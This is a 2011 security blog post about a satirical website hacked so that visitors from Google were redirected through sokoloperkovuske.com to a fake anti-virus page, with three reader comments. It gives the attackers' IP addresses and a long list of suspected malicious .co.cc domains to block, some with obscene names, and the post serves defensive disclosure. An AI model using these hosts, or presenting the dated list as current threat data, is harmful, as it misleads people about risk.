Sponsored by..

Friday, 15 July 2011

Christwire.org hacked with sokoloperkovuske.com redirect

Update: this site is now clean :)

Christwire.org is a satirical site about religion, not a million miles away from The Onion in terms of content. It's quite a popular site in the US.

Unfortunately, the site has been hacked and the .htaccess file has been altered. Visitors Googling from "Christwire" (I suggest that you don't try this!) get redirected to a URL at sokoloperkovuske.com/in.php?pp=138 .. but if you visit the site directly, then you don't see anything. This type of trickery is quite common as it make it harder for the site owner to detect the problem.



sokoloperkovuske.com is registered with fake registration details and is hosted on 91.220.0.19 which is SIA Business Aviation Service in Latvia (Latvia is a common place for the bad guys to hang out). I would recommend blocking the entire 91.220.0.0/24 range to be on the safe side.. the SiteVet report shows a sharp uptick in malicious activity for this AS.

Visitors are then redirected to a fake anti-virus site at www2.bestaholder.co.cc which is multihomed on 112.175.243.24, 112.175.243.21, 112.175.243.22 and 112.175.243.23 in Korea. Those servers have a lot of .co.cc sites.. it's worth blocking access to ALL .co.cc sites if you can.


Other potentially malicious sites on the Korean cluster are:
3adalat.co.cc
440amg.co.cc
4ggw.com
9movies.co.cc
alldir.co.cc
alynwap.co.cc
anjatan.co.cc
arai.owner.linuxmaster.co.cc
araup.co.cc
articleinfo.co.cc
asiancatchy.co.cc
astrazeneca.co.cc
baby.d0ll.co.cc
bacha.chutiya.co.cc
baithuctap.co.cc
bangkokmusic.co.cc
bayer-ah.co.cc
bayerhealthcare.co.cc
bayeryoungenvoy.co.cc
bestmusic4u.co.cc
bharwa.ghashti.ka.bacha.chutiya.co.cc
bokepmurah.co.cc
cafeislam.co.cc
campingalhassan.co.cc
cardio-bayer.co.cc
cardplanet.co.cc
carolebayersager.co.cc
cbm64.co.cc
cclmail.co.cc
chitthumyar.co.cc
chutiya.co.cc
cialislevitrasalesviagra.co.cc
cimahi.co.cc
cuimu.com
cyberwhitestar.co.cc
d0ll.co.cc
danielm2.co.cc
davidsaw.co.cc
dc-fansite.co.cc
deafdating.co.cc
desidigg.co.cc
diane.co.cc
dianearbus.co.cc
dianebishtv.co.cc
dianekruger.co.cc
dianelanenude.co.cc
dianestanley.co.cc
dianeturton.co.cc
dnf2683.com
dogs4u.co.cc
ebookprovider.co.cc
ecstechnologies.net
evanj8.co.cc
exicorp.co.cc
exs-ti.co.cc
faceboox.co.cc
femalelife.co.cc
filmesgratis.co.cc
forward.lookup.co.cc
free-mature-pics.co.cc
fullmusick.co.cc
funadult.co.cc
gamebazaar.co.cc
gameslowd.com
getarticles.co.cc
ghashti.ka.bacha.chutiya.co.cc
gocthethao.co.cc
gombel.co.cc
guapunye.nick.arai.owner.linuxmaster.co.cc
hdytaufik.co.cc
hesitate.with.malaysian-hackers.co.cc
hk.co.cc
hot.k1ss.co.cc
igratatin.co.cc
ilman-media.co.cc
intercambiosvirtuales.co.cc
iosdiy.com
jawamark.co.cc
jeff-dunham.co.cc
jilnul.co.cc
k1ss.co.cc
ka.bacha.chutiya.co.cc
kecoakwap.co.cc
kn4h.co.cc
kutopersada.co.cc
lanxess-europe.co.cc
la-videoteca.co.cc
law4u.co.cc
leechouse.co.cc
lenadianejennings-blogspot.co.cc
levitravardenafilhcl.co.cc
limsadiane.co.cc
linuxmaster.co.cc
look.sexy.with.baby.d0ll.co.cc
mail.chitthumyar.co.cc
mail.co.cc
mail.kecoakwap.co.cc
mail.pvpdestiny.co.cc
malaysian-hackers.co.cc
malekmaktabi.co.cc
marshadianearnold.co.cc
mastineedz-com.co.cc
maturecunt.veronichka.co.cc
mdacom.co.cc
me.hot.k1ss.co.cc
microchip123.co.cc
misiondejesus.com
mobitech-forums.co.cc
moccainside.co.cc
moneysukh.co.cc
my-exploit.co.cc
name-server.co.cc
navanblog.co.cc
nestle.co.cc
nestle-gifts.co.cc
nestle-icecream.co.cc
neswangy.co.cc
nick.arai.owner.linuxmaster.co.cc
nutricys.com
outerxcircle.co.cc
owner.linuxmaster.co.cc
pacar.yang.sangat.perhatian.co.cc
paltak-vip.co.cc
paullzn.com
perely.co.cc
perhatian.co.cc
picallo.co.cc
pkfc.co.cc
pprox.co.cc
proxy999.co.cc
purwokerto-allnet.co.cc
pvpdestiny.co.cc
radiowahrheit.co.cc
rafaelius.co.cc
rapiddown.co.cc
rawbeen.co.cc
realoiltd.co.cc
richardwalean.co.cc
rodrigoecheverry.co.cc
r-o-o-t.co.cc
rumbayan.co.cc
sangat.perhatian.co.cc
sawa7.co.cc
sawomanis.co.cc
sexy.with.baby.d0ll.co.cc
shibukg.co.cc
smabugil.co.cc
smppanderman.co.cc
sweetlady.co.cc
tablat.co.cc
techcenter-lanxess.co.cc
tintob.co.cc
tjssr.com
torrentmovies.co.cc
traviansoftware.co.cc
uatu.co.cc
veronichka.co.cc
viancom.co.cc
vipfashiononline.com
viuu.co.cc
vobase.com
webkontes.co.cc
wiredtree.co.cc
with.baby.d0ll.co.cc
with.malaysian-hackers.co.cc
woman-fucking-animals.veronichka.co.cc
woshiyezhu.net
xuanye.tw
yahgoo.co.cc
yang.sangat.perhatian.co.cc
yasmindavidds.co.cc
ycmi-med.co.cc
zipwaves.co.cc

3 comments:

Silver said...

I just encountered another web site similarly hacked, did a search in Google, clicked on http://www.howtomakemyblog.com/seo/wordpress-blog-seo/ from the search results but got redirected to sokoloperkovuske.com/in.php?pp=11 instead.

I didn't know what was happening initially, was wondering why a blank page loaded, so I actually refreshed once or twice before I noticed that the URL had changed completely and looked suspicious, so I did another quick Google with the URL and found your post here.

I had my own Wordpress blog and cPanel running at the time on Chrome but I immediately cleared all browsing data and restarted and started running scans and all that but I do not even know if those are appropriate actions to take.

Just downloaded and installed the latest hosts file from hosts-file.net, should I add all the domains listed in your post here to the hosts file? Is that how it is supposed to be done?

Thanks.

Conrad Longmore said...

I didn't get a chance to analyse the fake AV software, but usually you have to install it first. Those things are usually fairly obvious - if you don't see anything odd then the chances are that you are not infected.

Rebel Chick said...

I was hacked by this company just a few weeks ago and had NO IDEA until last night. Thankfully, I was able to delete their redirect files with the help of a tutorial on Google!